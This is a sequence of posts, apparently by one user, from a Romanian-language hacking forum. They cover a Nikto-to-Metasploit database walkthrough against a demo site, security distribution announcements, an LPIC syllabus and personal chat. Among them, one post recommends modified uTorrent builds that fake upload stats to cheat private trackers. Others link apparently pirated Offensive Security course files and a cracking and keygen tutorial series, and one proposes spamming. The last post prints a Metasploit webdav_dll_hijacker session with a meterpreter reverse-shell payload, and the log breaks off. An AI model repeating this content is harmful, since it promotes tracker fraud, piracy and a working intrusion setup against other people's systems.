  11. Metasploit aduce foarte multe facilit??i de baz? pentru testarea de aplicatii web cu el. Din acest motiv, este firesc s? utilizeze pentru screening-ul de securitate de servere Web ?i aplica?ii Web mai multe instrumente. --------------------------------------------------------------------------------------- În cazul în care vine vorba de folosirea rezultatelor externe instrumente în date suplimentare sau stocuri de documentare, iar punctul focal pentru Metasploit msfconsole ?i sprijinul lor de baze de date prevede este pierdut. Nikto Începând cu versiunea 2.1.3 op?iunea privind serviciul RPC, punctele slabe identificate ?i a partaja informa?ii cu Metasploit. Aceast? posibilitate creeaz? o func?ionalitate unificat de logare, care s? permit? o analiz? ulterioar? a Metasploit o baz? de date central?. --------------------------------------------------------------------------------------- root@bt:~# cd /opt/metasploit35-dev/msf3/ root@bt:/opt/metasploit35-dev/msf3# ./msfconsole __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.5.1-dev [core:3.5 api:1.0] + -- --=[ 322 exploits - 99 auxiliary + -- --=[ 217 payloads - 20 encoders - 6 nops =[ svn r11149 updated today (2010.11.25) msf > version Framework: 3.5.1-dev.11003 Console : 3.5.1-dev.11003 msf > load xmlrpc ServerType=Web [*] XMLRPC Service: 127.0.0.1:55553 [*] XMLRPC Username: msf [*] XMLRPC Password: HlwLdvKY [*] XMLRPC Server Type: Web [*] XMLRPC Web URI: /RPC2 [*] Successfully loaded plugin: xmlrpc msf > db_driver sqlite3 [*] Using database driver sqlite3 msf > db_connect test-nikto [-] Note that sqlite is not supported due to numerous issues. [-] It may work, but don't count on it [*] Successfully connected to the database [*] File: test-nikto --------------------------------------------------------------------------------------- Dac? baza de date de testare este creat ?i a început serviciul RPC ar trebui s? fie verificate cu netstat: root@bt:~/msf-installers/nikto-2.1.3# netstat -anpt | grep 55553 tcp 0 0 127.0.0.1:55553 0.0.0.0:* LISTEN 21223/ruby --------------------------------------------------------------------------------------- Odat? ce totul ieste in regula, pot fi utilizate dup? cum urmeaz? Nikto. Importante sunt op?iunile de format ?i op?iuni suplimentare MSF MSF-o: @ HlwLdvKY http://localhost:55553/RPC2 care specific? serviciul RPC: root@bt:~/msf-installers/nikto-2.1.3# ./nikto.pl -Format msf -o msf:HlwLdvKY@http://localhost:55553/RPC2 -h demo.testfire.net - Nikto v2.1.3 --------------------------------------------------------------------------- + Target IP: 65.61.137.117 + Target Hostname: demo.testfire.net + Target Port: 80 + Start Time: 2010-11-27 10:06:49 --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved x-powered-by header: ASP.NET + Retrieved x-aspnet-version header: 2.0.50727 + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://192.168.1.120/images/". + Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + OSVDB-3092: /bank/: This might be interesting... + OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico) --------------------------------------------------------------------------------------- În urma auditului efectuat este în baza de date urm?toarele comenzi cu msfconsole db_vulns, db_notes db_host ?i interogare a informa?iilor: msf > db_notes [*] Time: Fri Nov 26 09:06:51 UTC 2010 Note: host=65.61.137.117service=microsoft-iis/6.0 type=nikto.999986 data={"result"=>"", "uri"=>"/ofQywa1R.aspx", "method"=>"GET", "message"=>"Retrieved x-aspnet-version header: 2.0.50727"} [*] Time: Fri Nov 26 09:07:38 UTC 2010 Note: host=65.61.137.117service=microsoft-iis/6.0 type=nikto.600376 data={"result"=>"", "uri"=>"/", "method"=>"HEAD", "messa-ge"=>"Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5)"} [*] Time: Fri Nov 26 09:07:39 UTC 2010 Note: host=65.61.137.117service=microsoft-iis/6.0 type=nikto.999990 data={"result"=>"", "uri"=>"/", "method"=>"GET", "messa-ge"=>"Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST "} [*] Time: Fri Nov 26 09:07:39 UTC 2010 Note: host=65.61.137.117service=microsoft-iis/6.0 type=nikto.999985 data={"result"=>"", "uri"=>"/", "method"=>"GET", "messa-ge"=>"Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST "} <snip> scuze de gramatica
  12. Downloads | BackTrack Linux - Penetration Testing Distribution Yes, the time has come again – for a new kernel, and a new release of BackTrack. Codenamed “Nemesis”. This release is our finest release as of yet with faster Desktop responsiveness, better hardware support, broader wireless card support, streamlined work environment. We could go on for pages on saying how great the new version is, but we’ll cut to the chase, and give you the run down: * Kernel 2.6.35.8 – *Much* improved mac80211 stack. * USB 3.0 support. * New wireless cards supported. * All wireless Injection patches applied, maximum support for wireless attacks. * Even *faster* desktop environment. * Revamped Fluxbox environment for the KDE challenged. * Metasploit rebuilt from scratch, MySQL db_drivers working out of the box. * Updated old packages, added new ones, and removed obsolete ones. * New BackTrack Wiki with better documentation and support. * Our most professional, tested and streamlined release ever. For those wanting to upgrade an older release of BT4, an apt-get update && apt-get dist-upgrade should do the job. care aveti backtrack r1 puteti sa faceti update la bt r2 Upgrading - BackTrack Linux care vreti sa va creati backtrack complect pe cd Customization - BackTrack Linux
  13. problema ii de la china din 2007 ,2008 si asa mai departe or atacat jumate din europa si direct pe nemti in parlament si spionaj industrie si pe americani,acuma vor sa interzica tot, si vor pina in 2014 sa introduca un fel de European Computer Driving Licence in toata europa (atacul vine direct din china de la organizatia chineza scloys si presupun nemtii ca mai au trojan dar nu le gasesc in pc) care incelege germana uitativa la reportajul asta YouTube - Angriff auf Berlin 1/4
  14. salut eu am cont pe filelist si pe extremshare si am upload 60 tera si download 20 tera eu am asa de slab netu 1500kb daca nu as manipula ma aruncau de mult afara de pe filelist sau extremschare cum fac ma duc pe pagina http://www.seba14.org/ trag utorent 2.0.4 ce are ii iel µtorrent 2.0.4__mult10_leecher.exe µtorrent 2.0.4__mult11_leecher.exe µtorrent 2.0.4__mult10_seeder.exe µtorrent 2.0.4__mult11_seeder.exe µtorrent 2.0.4__mult100_leecher.exe µtorrent 2.0.4__mult101_leecher.exe µtorrent 2.0.4__mult111_leecher.exe µtorrent 2.0.4__mult100_seeder.exe µtorrent 2.0.4__mult101_seeder.exe µtorrent 2.0.4__mult111_seeder.exe µtorrent 2.0.4__fakeup1x_leecher.exe µtorrent 2.0.4__fakeup2x_leecher.exe µtorrent 2.0.4__fakeup5x_leecher.exe µtorrent 2.0.4__fakeup8x_leecher.exe µtorrent 2.0.4__fakeup1x_seeder.exe µtorrent 2.0.4__fakeup2x_seeder.exe µtorrent 2.0.4__fakeup5x_seeder.exe µtorrent 2.0.4__fakeup8x_seeder.exe µtorrent 2.0.4__noreport_seeder.exe µtorrent 2.0.4__noreport_leecher.exe µtorrent 2.0.4__report.exe µtorrent 2.0.4__report_invert.exe µtorrent 2.0.4__invert.exe (download as upload) µtorrent 2.0.4__stealth.exe dau drumul peste noapte si de exemplu trag un joc xbox de 4,7 gb si la upload am peste noapte +20 gb upload merge de minune il folosesc de 3 ani
  15. Justin Searle was so kind to release the latest version of Samurai Webapplication Testing Framework made for the BruCON workshops. This is the latest version with the latest tools and will now be published during BruCON http://blog.brucon.org/2010/09/samurai-wtf-09-brucon-pre-release.html Be aware is that this version has some bugs. Use at own risk. They are working on another update to be released soon! Source: Main Page - BruCON 2010
  16. Si eu sint de acord si convins ca asa poti sa opti mai mult pe cale pasnica,si pe linga ce a scris B7ackAnge7z putem sa oferim noi un curs sa facem un curs (tip video tutorial) cu donatie primul curs de exemplu sa cuprinda numai aparare ca multa lume inca nu stie ce pericol il asteapta pe net. un curs ce cuprinde keylogger,trojan,etc...pentesting de exemplu cum functioneaza un e-mail Phishing atack dar nu areti tot cum functioneaza areti numai la suprafata si specifici pentru ce sint banii de la donatie al doilea curs cu 3 euro si specifici pentru ce sint banii pe linga asta mai facem un curs pentru interesati in domeniu hack un fel de pentest sau alt fel de curs ca doar sintem o gramada aicia si fiecare ii bun in categoria lui facem video tutorial cu explicatie fiecare in domenu lui, ne incelegem binenceles inainte fiecare ce categorie si le incarcam pe net ,dar nu aicia pe forum si trimitem linkul cu video la nemesis (la administartori forumului) si voi alegeti si cei bun deintre video si creiati un un curs din toate videourile care vin (wallpaper unul dintre voi sa faca un wallpaper pe care il folosim toti dintre noi ca Desktop background) dupa ce facem cursurile aunci trimitem spam cu cursul si scopul si iti garantez ca sint o gramada care sint interesati numai sa puii copii din ro scuze de gramatica si scris
  17. salut aicia sint niste video cu metasploit Metasploit Class Videos (Hacking Illustrated Series InfoSec Tutorial Videos) sau pe YouTube - Metasploit Class Videos
  18. neox

    Lpic-1

    daatdraqq daca iesti de acord til dau tie sa il retranscri corect pe romineste cind ii gata dar o sa dureze un pic pina ii gata Continut curs Aici este o list? de LPIC 1 - Teme ?i greutatea acestuia (greutate - Subiect): Examinarea 101: * Subiect 101 - Arhitectura sistemului O identifica configura 2 - set?ri hardware O 3 - Demararea sistemului O 3 - schimba nivelul de execu?ie ?i a opri sistemul sau reporni?i * Subiect 102 - instalarea Linux ?i de administrare a pachetelor O 2 - sunt de planificare layout disc O 2 - un manager de boot a instala O Gestiona?i o - biblioteci partajate O 3 - utilizarea de administrare a pachetelor Debian O 3 - RPM ?i pachetul de management YUM utilizând comenzi * Subiect 103 - GNU ?i Unix O 4 - Lucrul în linia de comand? Textul O 3 - Procesul de fluxuri folosind filtre O 4 - gestionarea fi?ierelor de baz? O 4 - curenti, folosind ?evi ?i redirec?ionarea O 4 - Crea?i procese pentru a monitoriza ?i opri O 2 - priorit??ile de execu?ie procesul de schimbare O 2 - C?utare text fi?iere folosind expresii regulate O 3 - editarea fi?ierelor de baz? cu vi * Subiect 104 - Echipamente, sisteme de fi?iere Linux, sistemul de fi?iere Ierarhia standard O 2 - Crearea parti?iilor ?i sistemelor de fi?iere O 2 - Asigurarea integrit??ii sistemele de fi?iere O Controlul 3 - montarea ?i demontarea sistemelor de fi?iere O 1 - gestiona cotele de disc O 3 - permisiunile de fi?iere ?i de gestionare a propriet??ii O 2 - hard ?i leg?turi simbolice, crea?i ?i s? modifica?i O 2 - G?se?te fi?ierele de sistem ?i fi?iere loc în locul potrivit Examinarea 102: * Subiect 105 - scoici, script-uri ?i de administrare a datelor O 4 - Particulariza?i mediu coaj? ?i utilizarea O 4 - Usor de a scrie script-uri sau adapta O 2 - SQL Data Management * Subiect 106 - suprafe?e ?i desktop O 2 - instalarea ?i configurarea X11 ?i O 2 - Crearea unui display manager O 1 - ajutor pentru persoane cu handicap * Subiect 107 - sarcini administrative O Administreaza 5 - conturi de utilizator ?i de grup ?i fi?iere legate de sistemul de O 4 - s? automatizeze sarcini de administrare de sistem de planificare de locuri de munc? O 3 - Localizare si Internationalizare * 108 Subiect - servicii de baz? Sistem O 3 - Gestionarea timp sistem O 2 - Sistemul de Logging O 3 - Bazele de agen?i de transfer Mail (MTAs) O 2 - imprimante Administreaza ?i procesele de imprimare * Subiect 109 - Re?eaua Fundamentele O 4 - Bazele de protocoale Internet O 4 - de baz? de configurare a re?elei O 4 - Re?eaua de baz? depanare O 2 - Client-DNS configura * Subiect 110 - Securitate O 3 - ?i îndeplini sarcinile administrative pentru securitate O 3 - Un calculator sigur O 3 - pentru a proteja datele prin criptare
  19. salut am facut un tutorial demo (deci ii numa demo)sub forma de pdf dar cind ii gata il fac si in pdf si in powerpoint präsentation intrebarea mea ii sinteti interesati de asa ceva, ca nu vreu sa il fac daca nu va intereseza ca ii mult de lucru si poate multi dintre voi stiti deja si la fiecare capitol fac un examen simulator sa va testati aicia ii demo sa vedeti cum ie Lpic-1.pdf rog un admin sa sterga dupa citeva zile
  20. america ii tara frumoasa dar si lor le merge greu cu criza si la iei nu mai sint bani si sint o gramada de oameni care au perdut tot cu criza ca la noi, iti spun din experienta voi multi va plingeti de romania, cai greu si naspa dar sa stiti ca ii o diferenta sa te duci in vizita sau sa traiesti acolo. vb de usa dar deviez un pic de la tema eu traiesc de ani de zile in germania si ii naspa ii o viata ca un robot ,eu daca nu ma duc o data pe an acasa o iau razna inebunesc. Diferenta care ii germania: traiesti bine ai tot ce vrei mincare,bautura,electronica,masina etc.. tot ce iti doresti Ai o viata ca un robot la lucru si acasa . Despre mincare ce sa zic (in europa tärile mai dezvoltate si usa cei mai multi oameni grasi) luam un exemplu eu daca vreu sa cumpar rosii trebuie sa am noroc sa gasesc rosi ca la noi aicia ii plastic cu apa rosia Nu ai prieteni,adica ai dar nici o data nu te intelegi cu iei ca la noi (alta mentalitate) trebuie sa fii nascut in germania sa te incelegi cu iei Exemplu prieten de ani de zile o vizitat si rominia, dar sa zicem facem gratare la mine in curte sau la iel fiecare isi aduce carnea de acasa ,checeap,maioneza si sarea si piperul de acasa si nu numai iel ii asa toti sint asa toti pe line (si sacul cu carbuni facem jumi juma) no prietenul are copii si un copil ii pofticios si eu am cirnat pe gratar, prietenul are alceva nu ii da voi la copil daca cere o bucata de cirnat sa iei de la mine (raspunsul lui nu ii da lasa ca ii iau si lui data vitoare ca doar tu lucrezi pentru banii pe care iai dat pe cirnat) vizite dau telefon ce faci mine pot sa vin pina la tine in vizita raspuns stai sa o intreb si pe nevasta no bun o intraba si iti spune mine nu se poate ca trebuie sa spalam haine (de zici ca iel le spala cu mina ) alt prieten faci afaceri preitenul: ba nu iti trebuie un leptop ca vreau sal vind eu:cit ceri pe iel prietenul :ba fi atent am fost cu iel la consignatie (second-hand) si o zis ala ca imi da 200€ dar tie ca imi iesti prieten til dau cu 250 € eu: ba prostule la ala de la second-hand ca ii strain si nu il cunosti si il dai cu 200 si mie ca te cunosc de ata timp imi ceri 250 ma pur si simplu iel vede ca ii ceva normal si nu iti ramine decit sa ii spui ba nu imi trebuie dute si vindel altundeva inca ceva nu ai libertatea care o ai la noi sa faci ce vrei tu de exemplu daca nu am curte si vreu sa fac un gratar posibiltitatile sint urmatoarele ma duc undeva la padure sau la un riu la iarba verde no aprind gratarul dupa 5 minute apar pompieri iti stinge focul si iti da amenda deici nu ai unde sa te duci decit in loc public sa faci gratar dar acolo ii plin nu ai voie cu gratarul tau de acasa trebie sa faci la gratrul lor de beton si platit la pescuit mo prins fara permis am luat 390€ amenda no am zis ca ma duc sa fac permisul (care ii problema la iei au voie si pescari care au permis sa te controleze ) in fine ma duc sa imi fac permis intru in cladire sa iau ceva info imi spune permisul coasta 100 de euro pe an dar numai la balta la riu mai mult sau la mare no bun am zis ba asta ii ce sa fac ok sint de acord, no stai ca acuma vine partea grea si imi da o carte si formulare ba ca la scoala de soferi inveti si dai examen (270€ costa examenul) ca sa iei permisul de pescuit mam lasat si sint pescar inrait dar nu iera problema de bani problema ii absurditatea care ii si multi romini care am cunoscut aicia sint la fel foarte putini raimn ca la noi in tara de treaba tigara aruncata jos 25€ amenda a doua oara 70€ (daca ai voie sa fumezi numai in anumite locuri) si cea mai tare faza eu am permis de conducere daca ma prinde beat pe bicicleta imi ia permisul de conducere ca oameni sint foarte rai eu daca as mai putea sa dau timplu inapoi nasi mai ramine aicia pentru nimic in lume cel mai bine ii acasa in ro chiar daca nu ai banii multi acuma lucrez in domniu pc dar inainte 5 anii am lucrat in domeniu wind turbine (producatoare de curent electric) care iera munca toata ziua umblam cu inca un tip, mergem cu masina pe cimp si controlam daca sa invirte elicia de la turbina (plitisela no sa nu imi dau glont) sucuze de gramatica si scris
  21. danke ICEBREAKER uite aicia CCNA FREE ii foare bun Free CCNA Lab Workbook Video Table of Contents | Free CCNA Workbook
  22. CAINE 2.0 (code name "NewLight") and NBCaine 2.0 Released CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a project of Digital Forensics.CAINE offers a complete forensic environment that is organized to integrate existing software tools as software modules and to provide a friendly graphical interface. The main design objectives that CAINE aims to guarantee are the following: http://2.bp.blogspot.com/_xJ5LrusWfss/TI_BDHlcJgI/AAAAAAAAAmY/1qC0NmG4lfY/s1600/caine2.0.jpg -an interoperable environment that supports the digital investigator during the four phases of the digital investigation -a user friendly graphical interface -a semi-automated compilation of the final report Download and more info: CAINE Live CD - NewLight computer forensics digital forensics ------------------------------------------------------- DVWA 1.0.7 released Damn Vulnerable Web Application Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. Do not upload it to your hosting provider's public html folder or any internet facing web server as it will be compromised. We recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing. What’s new? The vulnerability help page has been improved. We now display the logged on username along with the vulnerability level and php-ids status. Blind SQL injection has been implemented. We now have official documentation. You can now compare all vulnerable source code in one page with the ‘view all’ button. The whole theme has been redesigned, including a new great looking logo. Many bug fixes and small changes throughout the application. But that’s not all, we have continued the work that Duncan Alderson had done on the 1.0.6 LiveCD, as the LiveCD proved to be a great success. The new LiveCD is not only a vulnerable web application but also a badly configured web server which includes many server misconfiguration. Download and more info: Damn Vulnerable Web App - DVWA --------------------------------------------------- NetSecL 3.0 Released The new version of NetSecL 3.0 is a live DVD + installation based on OpenSuse. Once installed you can fully enjoy the features of GrSecurity hardened kernel and penetration tools OR if you like to do some penetration testing you can directly run all tools from the live DVD. The password for both admin and root user on the DVD is linux NetSecL firewall is included as always and most of the penetration tools are ported to the new platform. Also we'd like to mention that we've got many other programs up and running with GrSecurity enabled, which is great success especially when it comes to programs like wine, OpenOffice, Vuze, Qemu and many gnome applications. Warning: when you install use ext3 (tested) for root partition. Minimal System Requirements for running the live DVD: 512 MB of RAM Minimal System Requirements for installing: 1 GB of RAM, 5 GB partition at least (SATA-tested) With that said we think that the new version of NetSecL is fully function as a Desktop,Server and Penetration testing environment. For more info and download check NetSecL Project ----------------------------------------------------------- VIPER VAST Live Distro beta 2.77 Realeased VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. VAST also has built into synaptic package manager a third party repository link for the VIPER tools, so when we update a tool it's as easy as "apt-get" http://2.bp.blogspot.com/_xJ5LrusWfss/TGVx7XQJ6SI/AAAAAAAAAi0/z70ZHzmyeMo/s1600/screen2.png Version 2.77 now includes Artemisa a VoIP Honeypot. From Artemisa: "Artemisa is a VoIP/SIP-specific honeypot software designed to connect to a VoIP enterprise domain as a user-agent back end in order to detect malicious activity at an early stage. Moreover, the honeypot can play a role in the real-time adjustment of the security policies of the enterprise domain where it is deployed." Download: SourceForge.net: Download and Develop Open Source Software for Free - VIPER VAST Live Distro -------------------------------------------------------------------- Forensic Toolkit (FTK) Version 3 THE INDUSTRY-STANDARD COMPUTER FORENSICS SOFTWARE USED BY GOVERNMENT AGENCIES AND LAW ENFORCEMENT AROUND THE WORLD http://3.bp.blogspot.com/_xJ5LrusWfss/TGEKbUi-7eI/AAAAAAAAAiU/VCIPK9Eui9E/s1600/FUCK+YOU!.jpg Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford. Download: AccessData delivers computer forensics, cyber security, incident response, eDiscovery and information assurance software solutions. review-access-data-forensic-toolkit-ftk-version-3-part-1/ https://blogs.sans.org/computer-forensics/2010/08/09/review-access-data-forensic-toolkit-ftk-version-3-part-1/ ---------------------------------------------------------------------------------- SECmic3 - Security Distro A Kubuntu 10.04 LTS Lucid Lynx based security distro http://3.bp.blogspot.com/_xJ5LrusWfss/TF2rtylA2wI/AAAAAAAAAhE/v8KP5G_IrtI/s1600/SECmic3-desktop-menu.png SECmic3 is a Kubuntu 10.04 LTS Lucid Lynx based security distribution. It is FREE to download, and will be forever. It comprises over 200 security oriented applications preinstalled. SECmic3 is Ubuntu/Kubuntu update compatible. Meaning you will be able to receive security updates directly from the Ubuntu/Kubuntu repositories for the lifetime of this Kubuntu 10.04 LTS based release. Get SECmic3 from: http://secmic.org SECmic3-security-pentest on Vimeo ( video demo ) ------------------------------------------------------------------------------------ Network Security Toolkit (NST v2.13.0) Network Security Toolkit (NST) is a bootable ISO image (Live CD) based on Fedora Core 11 providing easy access to best-of-breed Open Source Network Security Applications and should run on most x86 platforms. NST can also be used for crash recovery. This release will include many geolocation enhancements for both Wireshark and Ntop. One can now geolocate Wireshark IPv4 Address conversations or Ntop hosts on a Mercator World Map projection or on an Earth Browser (i.e., Google Earth). See the Overview page on the NST Wiki Site for hourly generated maps demonstrating the Ntop hosts geolocation implementation. Download: SourceForge Downloads ------------------------------------------------------------------------------------ Wintaylor 2.0 Live Analysis and Incident Response tool WinTaylor is the new forensic interface built for Windows and included in CAINE Live CD. It is written in Visual Basic 6 to maximize compatibility with older Windows systems, and provides an internal set of well-known forensic programs. WinTaylor proposes a simple and complete forensic software integration and inherits the design philosophy of CAINE. To ensure transparency of the operations performed by WinTaylor during its execution, we have made available the source code of the program, that is licensed under the Lesser GPL License 2.1. The code is visible and editable, for the benefit of developers and to preserve the good standards of open source forensic software. The interface is structured in the familiar CAINE’s tabs style, and implements the well-known reporting system to record the investigative sessions. Features Report creation tool, that saves in a plain and portable text file the list of used programs with time-stamps . Tabbed structure that gives a logical schema to the investigation process. Command-line tools that print their output inside WinTaylor. Updated Sysinternals tools Versatile hashing tool Snapshot tool http://2.bp.blogspot.com/_xJ5LrusWfss/TDDtesmdTfI/AAAAAAAAAfE/gCaTVG6a8tQ/s1600/1.jpg Download: CAINE Live CD - NewLight computer forensics digital forensics ------------------------------------------------------------------------------------- Live HACKING CD New Linux Distribution for Ethical Hacking and Penetration Testing Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders. http://4.bp.blogspot.com/_xJ5LrusWfss/S-6L-wu0nII/AAAAAAAAAa4/KyzDCSksbQ4/s1600/Live-Hacking-CD.gif The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools. The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included. Download: SourceForge.net: Download and Develop Open Source Software for Free --------------------------------------------------------------------------------------- DEFT Linux 5.1 Released DEFT Linux Computer Forensic Live CD DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs http://4.bp.blogspot.com/_xJ5LrusWfss/S-G6VBzwp2I/AAAAAAAAAZw/XLT47daE9u4/s1600/forensic-software.png What’s new? Update: Sleuthkit 3.1.1 and Autopsy 2.24 Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP) Update: Initrd Bug fix: Dhash report (reports were not generated) Bug fix: DEFT Extra bug fix (a few tools did not work if the operator click on their icons, added the dd tool for x64 machines) Download: DEFT Linux - Computer Forensics live cd -------------------------------------------------------------------------------------- EmErgE's MultiISO LiveDVD 2.0 MultiISO LiveDVD is an integrated Live DVD technology which combines some of the very popular Live CD ISOs already available on the internet. It can be used for security reconnaissance, vulnerability identification, penetration testing, system rescue, media center and multimedia, system recovery, etc. It's a all-in-one multipurpose LiveDVD put together. foto http://1.bp.blogspot.com/_xJ5LrusWfss/S7d6_ApXlPI/AAAAAAAAAVo/vnKGa-TYcwA/s1600/multiiso-livedvd-2.0.png MultiISO LiveDVD 2.0 consists of following distros: Backtrack 4 GeeXBoX Damn Small Linux Clonezilla Offline NT Password & Registry Editor FreeDOS Damn Vulnerable Linux Trinity Rescue Kit Tiny Core Linux Helix 3 Puppy Linux Byzantine OS Pentoo Linux Dban boot.kernel.org (bko) Download: http://binarybum.com/MultiISO-2.0-final.iso Torrent Link: http://badfoo.net more info: badfoo.net -------------------------------------------------------------------------------------- SANS Investigative Forensic Toolkit Workstation: v2.0 Released SANS Investigative Forensic Toolkit (SIFT) Workstation: Version 2.0 The SANS SIFT Workstation is a VMware Appliance that is pre-configured with all the necessary tools to perform a detailed digital forensic examination. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The brand new version has been completely rebuilt on an Ubuntu base with many additional tools and capabilities that can match any modern forensic tool suite. File system support Windows (MSDOS, FAT, VFAT, NTFS) MAC (HFS) Solaris (UFS) Linux (EXT2/3) Software Includes: The Sleuth Kit (File system Analysis Tools) log2timeline (Timeline Generation Tool) ssdeep & md5deep (Hashing Tools) Foremost/Scalpel (File Carving) WireShark (Network Forensics) Vinetto (thumbs.db examination) Pasco (IE Web History examination) Rifiuti (Recycle Bin examination) Volatility Framework (Memory Analysis) DFLabs PTK (GUI Front-End for Sleuthkit) Autopsy (GUI Front-End for Sleuthkit) PyFLAG (GUI Log/Disk Examination) http://4.bp.blogspot.com/_xJ5LrusWfss/S6yoY9QarzI/AAAAAAAAAVI/6dmQkMmB-B4/s1600/sift-ptk-big.jpg More info and Download: SANS - Computer Forensics and e-Discovery with Rob Lee
  23. ca sa nu mai deschid un nou post voi posta aicia Offensive Security 101 V1 deci ii cu backtrack 2 sa stiti ca sa nu ma injurati:) poate sint care nu au versiunea 1 si are nevoie Labs: MEGAUPLOAD - The leading online storage and file delivery service Lab Guide: MEGAUPLOAD - The leading online storage and file delivery service Videos: MEGAUPLOAD - The leading online storage and file delivery service MEGAUPLOAD - The leading online storage and file delivery service MEGAUPLOAD - The leading online storage and file delivery service si Offensive-Security cu Bt3 sub forma de pdf http://www.megaupload.com/?d=D1X8HXBS http://depositfiles.com/files/p912ii23u http://www.badongo.com/file/23861476 http://www.easy-share.com/1911856216/offensive-security-labs-khi3mkp-bt3.pdf
  24. 01. Olly + assembler + patching a basic reverseme 02. Keyfiling the reverseme + assembler 03. Basic nag removal + header problems 04. Basic + aesthetic patching 05. Comparing on changes in cond jumps, animate over/in, breakpoints 06. "The plain stupid patching method", searching for textstrings 07. Intermediate level patching, Kanal in PEiD 08. Debugging with W32Dasm, RVA, VA and offset, using LordPE as a hexeditor 09. Explaining the Visual Basic concept, introduction to SmartCheck and configuration 10. Continued reversing techniques in VB, use of decompilers and a basic anti-anti-trick 11. Intermediate patching using Olly's "pane window" 12. Guiding a program by multiple patching. 13. The use of API's in software, avoiding doublechecking tricks 14. More difficult schemes and an introduction to inline patching 15. How to study behaviour in the code, continued inlining using a pointer 16. Reversing using resources 17. Insights and practice in basic (self)keygenning 18. Diversion code, encryption/decryption, selfmodifying code and polymorphism 19. Debugger detected and anti-anti-techniques 20. Packers and protectors : an introduction 21. Imports rebuilding 22. API Redirection 23. Stolen bytes 24. Patching at runtime using loaders from lena151 original 25. Continued patching at runtime & unpacking armadillo standard protection 26. Machine specific loaders, unpacking & debugging armadillo 27. tElock + advanced patching 28. Bypassing & killing server checks 29. Killing & inlining a more difficult server check 30. SFX, Run Trace & more advanced string searching 31. Delphi in Olly & DeDe 32. Author tricks, HIEW & approaches in inline patching 33. The FPU, integrity checks & loader versus patcher 34. Reversing techniques in packed software & a S&R loader for ASProtect 35. Inlining inside polymorphic code 36. Keygenning 37. In-depth unpacking & anti-anti-debugging a combination packer / protector 38. Unpacking continued & debugger detection by DLL's and TLS 39. Inlining a blowfish scheme in a packed & CRC protected dll + unpacking Asprotect SKE 2.2 40. Obfuscation and algorithm hiding Hotfile.com: One click file hosting: Reversing for Newbies Series.rar
  25. eu cred ca te referi la asa ceva te uiti la video tse.rar sau asa Filetype endump msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump EXTENSIONS => endump msf exploit(webdav_dll_hijacker) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BASENAME policy yes The base name for the listed files. EXTENSIONS endump yes The list of extensions to generate SHARENAME documents yes The name of the top-level share. SRVHOST 192.168.2.37 yes The local host to listen on. SRVPORT 80 yes The daemon port to listen on (do not change) URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.2.37 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(webdav_dll_hijacker) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.2.37:4444 [*] [*] Exploit links are now available at \\192.168.2.37\documents\ [*] [*] Using URL: http://192.168.2.37/ [*] Server started. msf exploit(webdav_dll_hijacker) > [*] 192.168.2.45:49310 PROPFIND /documents [*] 192.168.2.45:49310 PROPFIND => 301 (/documents) [*] 192.168.2.45:49310 PROPFIND /documents/ [*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/) [*] 192.168.2.45:49310 